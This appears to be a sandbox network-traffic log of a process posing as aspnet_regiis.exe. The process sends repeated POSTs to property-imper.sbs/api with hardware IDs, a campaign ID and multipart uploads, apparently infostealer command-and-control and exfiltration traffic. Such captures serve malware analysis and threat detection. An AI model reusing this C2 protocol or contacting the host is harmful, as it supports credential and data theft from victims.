2024-11-23 02:11:08 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: property-imper.sbs
2024-11-23 02:11:08 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-23 02:11:08 UTC	1011	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 02:11:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tq4uad7k2j3jfk5m3v8acs58d0; expires=Tue, 18-Mar-2025 19:57:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bzSdp695pWYOIhxcpbGvVWVX5vSiYVa9y7MlUiSz4Py77QfgGG0QP1BnGbfPASSMP2wEDdz4VFrQ5va8FxVTVcNj9EYkSvnWj%2BO2K6htIo8eD4PGTezitNNxGhS1rwubD6i0%2BmY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6da0799e794239-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1598&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1782661&cwnd=227&unsent_bytes=0&cid=63886be88558d705&ts=923&x=0"
2024-11-23 02:11:08 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-23 02:11:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	104.21.33.116	443	768	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 02:11:10 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: property-imper.sbs
2024-11-23 02:11:10 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 62 65 6e 7a 6f 79 6f 6c 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@benzoyolo&j=
2024-11-23 02:11:11 UTC	1015	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 02:11:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cl6brs7v5lm06hat9gtdoh00u7; expires=Tue, 18-Mar-2025 19:57:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GzjoWEFgW5s8ohmE2aVK8Z9CGwF9BQI%2BgMaszQoAmZ%2FZPpdynnSEwJc2Vj5%2BOAOW6xMjPhEirHX64JfHI45wiPYugclR2L4yi%2BzzWuxQcGKDeyQ8JyQlEU2xf9zgzyQMwtydzXk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6da087ef2280d9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1640&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=954&delivery_rate=1709601&cwnd=252&unsent_bytes=0&cid=5d164186d424bef1&ts=762&x=0"
2024-11-23 02:11:11 UTC	354	IN	Data Raw: 34 34 36 63 0d 0a 59 53 32 50 5a 42 71 6b 49 63 48 73 76 75 62 72 54 42 51 64 4e 4d 4a 30 4e 78 56 78 58 57 30 50 53 31 65 4b 41 6d 4c 4e 66 4b 41 61 44 2f 6c 47 49 4a 41 4e 34 35 2f 62 78 4e 45 34 5a 6d 68 52 37 6c 5a 57 63 56 4e 6e 43 32 34 6e 4a 4f 38 75 51 4c 73 52 67 6c 74 4c 37 67 68 70 77 51 33 6a 69 63 62 45 30 52 64 76 50 31 47 73 56 67 30 33 46 44 63 50 62 69 63 31 36 32 6b 4e 76 52 44 44 43 55 48 6f 44 48 2f 48 52 61 43 41 30 34 4f 4f 4b 58 56 33 57 71 73 5a 58 33 68 54 63 55 39 71 4d 58 57 77 49 43 2b 6f 43 4d 45 73 54 50 77 50 4f 4e 6b 4e 75 73 37 62 69 4d 6c 32 4e 6e 78 52 6f 42 68 52 63 52 6f 31 42 57 63 76 4e 4f 35 6f 45 71 51 61 79 41 6c 50 36 77 31 31 7a 6c 47 74 69 74 53 49 69 43 4e 31 50 78 6a 67 45 55 30 33 53 33 39 63 58 79 6f 6b 2b Data Ascii: 446cYS2PZBqkIcHsvubrTBQdNMJ0NxVxXW0PS1eKAmLNfKAaD/lGIJAN45/bxNE4ZmhR7lZWcVNnC24nJO8uQLsRgltL7ghpwQ3jicbE0RdvP1GsVg03FDcPbic162kNvRDDCUHoDH/HRaCA04OOKXV3WqsZX3hTcU9qMXWwIC+oCMEsTPwPONkNus7biMl2NnxRoBhRcRo1BWcvNO5oEqQayAlP6w11zlGtitSIiCN1PxjgEU03S39cXyok+
2024-11-23 02:11:11 UTC	1369	IN	Data Raw: 79 30 4f 78 68 74 65 50 6a 44 78 39 64 6c 75 74 46 6c 68 39 48 44 77 50 61 69 4d 2f 35 32 6f 45 6f 68 50 45 41 30 2b 74 53 44 6a 42 57 2b 50 57 6e 4b 65 4d 50 6e 46 7a 51 4f 49 73 46 57 68 64 4a 6b 39 71 4a 58 57 77 49 41 69 71 48 63 45 49 51 4f 34 4f 63 39 52 44 73 59 6a 52 67 5a 73 6f 63 33 46 63 6f 77 52 66 65 52 55 38 42 6d 59 67 4d 4f 39 6b 51 4f 46 65 78 52 73 50 74 55 5a 5a 79 30 69 76 68 4d 75 45 79 54 45 34 5a 68 61 6e 47 68 55 76 55 7a 73 4f 61 53 67 78 35 6d 34 45 6f 78 6a 4d 44 6b 44 72 44 48 6a 42 53 61 75 47 33 59 6d 43 49 58 5a 36 57 36 51 51 57 58 59 57 66 30 45 74 4c 69 32 6f 4f 45 43 42 47 63 45 52 44 64 67 46 64 73 68 45 74 63 37 44 79 70 42 75 63 58 4d 57 2b 46 5a 62 63 68 77 74 44 6e 38 73 4f 2f 70 73 42 61 6b 54 77 51 31 50 36 41 46 Data Ascii: y0OxhtePjDx9dlutFlh9HDwPaiM/52oEohPEA0+tSDjBW+PWnKeMPnFzQOIsFWhdJk9qJXWwIAiqHcEIQO4Oc9RDsYjRgZsoc3FcowRfeRU8BmYgMO9kQOFexRsPtUZZy0ivhMuEyTE4ZhanGhUvUzsOaSgx5m4EoxjMDkDrDHjBSauG3YmCIXZ6W6QQWXYWf0EtLi2oOECBGcERDdgFdshEtc7DypBucXMW+FZbchwtDn8sO/psBakTwQ1P6AF
2024-11-23 02:11:11 UTC	1369	IN	Data Raw: 63 37 44 79 70 42 75 63 58 4d 57 2b 46 5a 5a 66 68 4d 30 42 57 6b 70 4d 75 56 6c 41 36 67 64 7a 77 52 46 34 77 46 38 79 6b 71 75 69 4e 79 44 6a 53 74 6b 65 6c 2b 73 47 68 55 35 55 7a 67 58 4c 58 46 31 78 32 63 57 72 44 48 42 45 6b 61 74 47 54 62 66 41 36 53 43 6e 4e 7a 4a 4b 58 4e 33 58 61 59 65 56 57 55 57 4d 51 52 73 49 7a 50 70 62 51 79 70 48 73 4d 44 53 65 45 47 66 38 46 52 73 59 76 61 6c 6f 4e 75 4f 44 39 52 75 46 59 4e 4e 79 55 76 47 48 77 2f 64 39 31 6a 44 71 45 5a 31 45 4e 51 6f 78 38 34 77 55 2f 6a 31 70 79 50 69 53 4a 78 64 31 43 6b 48 6c 70 34 47 69 30 4f 59 53 63 6e 37 32 41 4a 6f 52 48 4f 43 6b 4c 71 43 33 50 4d 54 71 65 4a 33 63 54 48 62 6e 46 6e 46 76 68 57 59 32 63 65 4d 79 46 6d 4a 54 79 6f 66 30 36 32 58 73 55 50 44 37 56 47 66 4d 70 4c Data Ascii: c7DypBucXMW+FZZfhM0BWkpMuVlA6gdzwRF4wF8ykquiNyDjStkel+sGhU5UzgXLXF1x2cWrDHBEkatGTbfA6SCnNzJKXN3XaYeVWUWMQRsIzPpbQypHsMDSeEGf8FRsYvaloNuOD9RuFYNNyUvGHw/d91jDqEZ1ENQox84wU/j1pyPiSJxd1CkHlp4Gi0OYScn72AJoRHOCkLqC3PMTqeJ3cTHbnFnFvhWY2ceMyFmJTyof062XsUPD7VGfMpL
2024-11-23 02:11:11 UTC	1369	IN	Data Raw: 47 4d 4b 6e 46 37 55 4b 39 57 47 7a 63 55 4a 30 38 31 61 52 72 50 56 55 4b 4f 4a 49 49 63 41 66 52 47 66 38 6f 44 2b 38 37 51 68 34 55 6d 65 58 6c 66 72 42 78 63 66 42 38 30 43 32 45 67 4d 4f 35 68 42 61 6f 66 78 67 39 46 36 77 56 37 79 55 79 73 68 70 7a 4b 79 53 6c 75 50 77 37 67 4d 30 4a 38 48 54 6c 50 63 6d 63 73 71 47 63 4d 37 30 61 43 44 30 62 72 41 48 33 4b 51 71 57 47 32 59 79 4e 4c 33 42 35 56 61 38 53 55 48 59 63 4f 77 4e 6a 49 7a 54 70 62 41 75 67 46 63 64 44 41 61 30 42 59 49 59 62 34 37 2f 66 6b 70 34 2b 65 6a 39 4a 37 67 38 56 63 42 39 2f 56 79 30 6f 4a 2b 4a 71 44 71 6f 52 78 77 42 41 36 67 74 2b 79 6b 6d 71 68 74 71 4c 67 44 78 31 63 31 69 6e 47 46 6c 35 48 6a 55 4d 59 47 6c 37 71 47 63 59 37 30 61 43 4c 30 6a 67 4b 48 50 4b 52 4f 4f 52 6b Data Ascii: GMKnF7UK9WGzcUJ081aRrPVUKOJIIcAfRGf8oD+87Qh4UmeXlfrBxcfB80C2EgMO5hBaofxg9F6wV7yUyshpzKySluPw7gM0J8HTlPcmcsqGcM70aCD0brAH3KQqWG2YyNL3B5Va8SUHYcOwNjIzTpbAugFcdDAa0BYIYb47/fkp4+ej9J7g8VcB9/Vy0oJ+JqDqoRxwBA6gt+ykmqhtqLgDx1c1inGFl5HjUMYGl7qGcY70aCL0jgKHPKROORk
2024-11-23 02:11:11 UTC	1369	IN	Data Raw: 32 65 45 37 67 54 68 56 42 46 43 38 66 62 6d 73 45 2f 6d 4d 57 70 42 50 4f 51 31 43 6a 48 7a 6a 42 54 2b 50 57 6e 49 4b 47 4a 33 56 77 56 36 6b 61 57 48 49 61 4f 67 35 72 4c 54 2f 69 59 41 61 70 48 38 63 4a 54 4f 77 4d 63 63 46 4c 70 49 33 4f 78 4d 64 75 63 57 63 57 2b 46 5a 38 63 41 45 78 48 79 30 32 65 2f 45 67 42 36 4e 65 6d 6b 4e 4c 35 77 6c 38 77 55 2b 6c 69 39 71 4a 69 43 46 33 66 31 6d 6b 48 56 78 78 45 6a 49 4b 59 43 30 6e 34 6d 73 50 6f 78 66 4f 44 67 2b 6a 52 6e 2f 65 41 2f 76 4f 37 59 6d 48 49 48 46 70 46 72 39 59 54 44 63 55 4d 30 38 31 61 54 54 6b 62 77 4f 67 48 63 45 43 52 66 38 55 64 4d 39 4c 70 6f 4c 58 69 6f 38 38 63 48 42 66 6f 78 56 63 63 42 73 7a 42 57 34 75 64 61 59 67 42 37 64 65 6d 6b 4e 73 2b 68 5a 31 68 6c 7a 74 6c 35 79 44 68 57 Data Ascii: 2eE7gThVBFC8fbmsE/mMWpBPOQ1CjHzjBT+PWnIKGJ3VwV6kaWHIaOg5rLT/iYAapH8cJTOwMccFLpI3OxMducWcW+FZ8cAExHy02e/EgB6NemkNL5wl8wU+li9qJiCF3f1mkHVxxEjIKYC0n4msPoxfODg+jRn/eA/vO7YmHIHFpFr9YTDcUM081aTTkbwOgHcECRf8UdM9LpoLXio88cHBfoxVccBszBW4udaYgB7demkNs+hZ1hlztl5yDhW
2024-11-23 02:11:11 UTC	1369	IN	Data Raw: 73 68 4e 54 65 42 77 32 42 6d 6b 68 4e 75 68 6b 42 4b 67 62 77 51 39 45 36 67 56 33 77 6b 71 74 68 39 50 45 78 32 35 78 5a 78 62 34 56 6e 52 73 45 44 4d 43 4c 54 5a 37 38 53 41 48 6f 31 36 61 51 30 50 6a 41 33 6a 4d 52 61 65 4c 32 6f 36 4d 4c 6e 31 38 57 61 51 51 55 58 67 54 4e 41 5a 73 4c 7a 44 69 61 77 61 69 48 63 51 46 44 36 4e 47 66 39 34 44 2b 38 37 38 6e 34 51 69 63 54 39 4a 37 67 38 56 63 42 39 2f 56 79 30 69 4f 65 78 6e 41 4b 49 64 79 67 5a 4c 35 77 4e 34 7a 6c 47 72 6a 74 75 57 6d 79 35 2f 65 6c 71 6a 46 6c 46 78 47 6a 6b 4d 61 57 6c 37 71 47 63 59 37 30 61 43 4c 6b 50 71 4c 33 2f 64 41 37 7a 41 78 63 53 4f 49 6a 59 6e 46 71 45 64 58 33 67 65 50 41 6c 75 49 6a 44 69 59 51 65 6e 45 39 41 41 51 4f 49 43 65 4d 6c 46 70 59 2f 54 67 6f 34 6e 64 33 64 Data Ascii: shNTeBw2BmkhNuhkBKgbwQ9E6gV3wkqth9PEx25xZxb4VnRsEDMCLTZ78SAHo16aQ0PjA3jMRaeL2o6MLn18WaQQUXgTNAZsLzDiawaiHcQFD6NGf94D+878n4QicT9J7g8VcB9/Vy0iOexnAKIdygZL5wN4zlGrjtuWmy5/elqjFlFxGjkMaWl7qGcY70aCLkPqL3/dA7zAxcSOIjYnFqEdX3gePAluIjDiYQenE9AAQOICeMlFpY/Tgo4nd3d
2024-11-23 02:11:11 UTC	1369	IN	Data Raw: 30 6b 30 4b 51 56 71 4f 54 4c 2f 62 30 44 68 58 73 31 44 46 39 52 47 63 63 46 59 73 70 6a 52 6c 49 35 75 53 54 45 57 75 46 59 4e 4e 79 59 38 41 57 4d 75 49 2f 6b 74 4a 37 6b 55 78 52 4e 49 2b 67 6b 34 69 41 4f 6c 7a 6f 54 58 78 32 35 79 62 68 62 34 52 67 63 73 52 6d 78 59 50 58 73 71 70 6e 6c 41 75 56 36 61 55 51 47 74 46 44 69 65 41 2b 53 4e 7a 70 61 50 4c 57 42 38 45 5a 34 6f 63 6d 30 65 4f 52 68 38 46 77 76 76 65 67 32 70 43 64 4e 50 57 75 34 49 64 73 46 56 34 38 43 63 69 38 6c 32 54 7a 38 65 34 43 6b 62 4e 77 74 2f 56 79 30 63 4e 75 5a 75 42 37 6b 50 6a 79 52 56 34 41 42 76 31 77 50 74 7a 74 72 45 30 58 34 34 50 31 4b 78 56 67 30 6e 51 57 52 61 50 6e 35 6c 75 6e 39 4f 74 6c 37 55 51 78 65 2f 53 44 6a 55 41 2f 76 4f 6d 34 65 62 50 48 42 38 51 4b 4e 52 Data Ascii: 0k0KQVqOTL/b0DhXs1DF9RGccFYspjRlI5uSTEWuFYNNyY8AWMuI/ktJ7kUxRNI+gk4iAOlzoTXx25ybhb4RgcsRmxYPXsqpnlAuV6aUQGtFDieA+SNzpaPLWB8EZ4ocm0eORh8Fwvveg2pCdNPWu4IdsFV48Cci8l2Tz8e4CkbNwt/Vy0cNuZuB7kPjyRV4ABv1wPtztrE0X44P1KxVg0nQWRaPn5lun9Otl7UQxe/SDjUA/vOm4ebPHB8QKNR
2024-11-23 02:11:11 UTC	1369	IN	Data Raw: 64 50 57 43 6f 37 35 6d 63 57 76 6c 50 6c 44 55 6a 73 45 47 6a 52 54 4f 50 41 6e 49 4c 4a 64 69 51 78 46 71 51 48 46 53 39 44 62 56 51 34 65 6d 4b 34 4d 68 2f 68 42 34 49 56 44 37 56 55 4e 6f 5a 52 34 39 61 63 77 34 6f 38 5a 48 6c 56 74 68 55 53 53 53 30 59 41 57 6f 6f 49 2f 68 33 44 2b 41 77 39 43 4a 78 30 78 4e 37 79 45 32 6b 6d 4d 33 45 78 32 35 35 50 77 36 5a 56 68 30 33 4c 48 46 50 64 57 6c 74 71 46 55 44 6f 52 44 46 46 56 36 67 49 58 62 42 51 72 57 65 79 34 76 47 41 45 42 65 46 75 35 57 55 7a 64 4c 62 55 45 74 4c 53 53 6f 4f 46 44 39 52 5a 64 51 47 4c 31 55 5a 34 68 61 34 35 69 63 33 4e 74 67 4e 6d 30 57 2b 46 59 53 64 41 45 74 43 57 34 2f 4e 71 39 65 50 6f 67 51 78 51 4a 5a 2f 51 74 30 35 30 43 79 68 4f 4b 36 6e 43 31 34 63 56 47 32 42 78 55 35 55 Data Ascii: dPWCo75mcWvlPlDUjsEGjRTOPAnILJdiQxFqQHFS9DbVQ4emK4Mh/hB4IVD7VUNoZR49acw4o8ZHlVthUSSS0YAWooI/h3D+Aw9CJx0xN7yE2kmM3Ex255Pw6ZVh03LHFPdWltqFUDoRDFFV6gIXbBQrWey4vGAEBeFu5WUzdLbUEtLSSoOFD9RZdQGL1UZ4ha45ic3NtgNm0W+FYSdAEtCW4/Nq9ePogQxQJZ/Qt050CyhOK6nC14cVG2BxU5U
2024-11-23 02:11:11 UTC	1369	IN	Data Raw: 74 49 2f 31 6a 45 4b 67 67 2f 43 35 64 36 68 5a 37 68 47 2b 6b 67 39 43 36 74 78 6c 6e 65 45 62 69 4d 46 5a 68 45 48 39 42 4c 54 46 31 73 43 41 74 76 52 6e 53 41 41 33 42 41 58 58 4b 41 37 7a 41 78 63 53 66 62 69 34 73 47 4f 41 45 46 53 39 54 65 41 78 2f 4f 7a 50 72 64 67 50 6f 49 50 77 75 58 65 6f 57 65 34 52 79 72 6f 72 4b 6b 59 6f 2b 63 55 46 6f 6a 51 52 53 5a 78 42 39 4b 6c 64 72 42 50 35 6a 41 4b 45 5a 67 6b 30 50 39 55 59 67 68 6d 36 78 69 63 79 48 79 77 74 4d 50 57 65 32 46 56 56 35 46 48 38 51 49 7a 42 31 2f 69 42 59 2f 46 43 43 45 51 2b 31 52 6a 2f 49 54 71 4b 4e 30 6f 65 62 50 48 42 38 51 4b 4e 52 61 30 6b 38 4e 41 35 39 4a 43 54 6c 5a 42 61 52 49 4f 55 46 53 75 6f 34 52 76 46 53 70 4a 36 65 6f 6f 6f 34 64 54 38 59 34 41 34 56 4c 31 4d 59 43 57 Data Ascii: tI/1jEKgg/C5d6hZ7hG+kg9C6txlneEbiMFZhEH9BLTF1sCAtvRnSAA3BAXXKA7zAxcSfbi4sGOAEFS9TeAx/OzPrdgPoIPwuXeoWe4RyrorKkYo+cUFojQRSZxB9KldrBP5jAKEZgk0P9UYghm6xicyHywtMPWe2FVV5FH8QIzB1/iBY/FCCEQ+1Rj/ITqKN0oebPHB8QKNRa0k8NA59JCTlZBaRIOUFSuo4RvFSpJ6eooo4dT8Y4A4VL1MYCW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49708	104.21.33.116	443	768	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 02:11:12 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=N23RGOI0DWZUJ3Q User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12822 Host: property-imper.sbs
2024-11-23 02:11:12 UTC	12822	OUT	Data Raw: 2d 2d 4e 32 33 52 47 4f 49 30 44 57 5a 55 4a 33 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 31 35 41 43 33 44 30 38 38 43 37 35 44 34 31 39 34 38 43 35 30 36 44 43 38 31 31 37 37 37 0d 0a 2d 2d 4e 32 33 52 47 4f 49 30 44 57 5a 55 4a 33 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 32 33 52 47 4f 49 30 44 57 5a 55 4a 33 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 62 65 6e 7a 6f 79 6f 6c 6f 0d 0a 2d 2d Data Ascii: --N23RGOI0DWZUJ3QContent-Disposition: form-data; name="hwid"D715AC3D088C75D41948C506DC811777--N23RGOI0DWZUJ3QContent-Disposition: form-data; name="pid"2--N23RGOI0DWZUJ3QContent-Disposition: form-data; name="lid"BVnUqo--@benzoyolo--
2024-11-23 02:11:13 UTC	1020	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 02:11:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ssr7d0s9gok4un8akm385vst6b; expires=Tue, 18-Mar-2025 19:57:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O48331rQvwGQgXPScSZE%2F6GX8PE4bK%2FZuYO9vT0NamDmF4ibldU4kEtgQOlYYDhP%2B7c3kdLJoneonM4EbCiqfJ93jvjUBTRoahp%2FGBDbK%2FSQDy9Q5LaYLs38nEYky9qqMpsfVcA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6da0958d3842fd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1760&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13761&delivery_rate=1645997&cwnd=247&unsent_bytes=0&cid=64699dccee109f59&ts=795&x=0"
2024-11-23 02:11:13 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 02:11:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49712	104.21.33.116	443	768	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 02:11:14 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XQLF3A2WQH5W User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15046 Host: property-imper.sbs
2024-11-23 02:11:14 UTC	15046	OUT	Data Raw: 2d 2d 58 51 4c 46 33 41 32 57 51 48 35 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 31 35 41 43 33 44 30 38 38 43 37 35 44 34 31 39 34 38 43 35 30 36 44 43 38 31 31 37 37 37 0d 0a 2d 2d 58 51 4c 46 33 41 32 57 51 48 35 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 51 4c 46 33 41 32 57 51 48 35 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 62 65 6e 7a 6f 79 6f 6c 6f 0d 0a 2d 2d 58 51 4c 46 33 41 32 57 51 Data Ascii: --XQLF3A2WQH5WContent-Disposition: form-data; name="hwid"D715AC3D088C75D41948C506DC811777--XQLF3A2WQH5WContent-Disposition: form-data; name="pid"2--XQLF3A2WQH5WContent-Disposition: form-data; name="lid"BVnUqo--@benzoyolo--XQLF3A2WQ
2024-11-23 02:11:15 UTC	1021	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 02:11:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=38q34j1gps0gv13impvcf8dud1; expires=Tue, 18-Mar-2025 19:57:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KnGjkW6VZ3cICUSFVSVJlpAJwkzofTmIZ%2BXEPRJ5lEDJm9bMtuRa9y%2FAXnLqr9K%2FGGv1F9bkXLiabIDW71rLgPRh1IUGeMJSCreHw1YPmwlctGlNCmsuSKuJQ%2B%2FND8C7hkkQPa8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6da0a38d9cc466-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1625&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2845&recv_bytes=15982&delivery_rate=1748502&cwnd=227&unsent_bytes=0&cid=01a608e47da88aa8&ts=807&x=0"
2024-11-23 02:11:15 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 02:11:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49714	104.21.33.116	443	768	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 02:11:17 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4WRWF5HSM9KRB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20542 Host: property-imper.sbs
2024-11-23 02:11:17 UTC	15331	OUT	Data Raw: 2d 2d 34 57 52 57 46 35 48 53 4d 39 4b 52 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 31 35 41 43 33 44 30 38 38 43 37 35 44 34 31 39 34 38 43 35 30 36 44 43 38 31 31 37 37 37 0d 0a 2d 2d 34 57 52 57 46 35 48 53 4d 39 4b 52 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 57 52 57 46 35 48 53 4d 39 4b 52 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 62 65 6e 7a 6f 79 6f 6c 6f 0d 0a 2d 2d 34 57 52 57 46 35 Data Ascii: --4WRWF5HSM9KRBContent-Disposition: form-data; name="hwid"D715AC3D088C75D41948C506DC811777--4WRWF5HSM9KRBContent-Disposition: form-data; name="pid"3--4WRWF5HSM9KRBContent-Disposition: form-data; name="lid"BVnUqo--@benzoyolo--4WRWF5
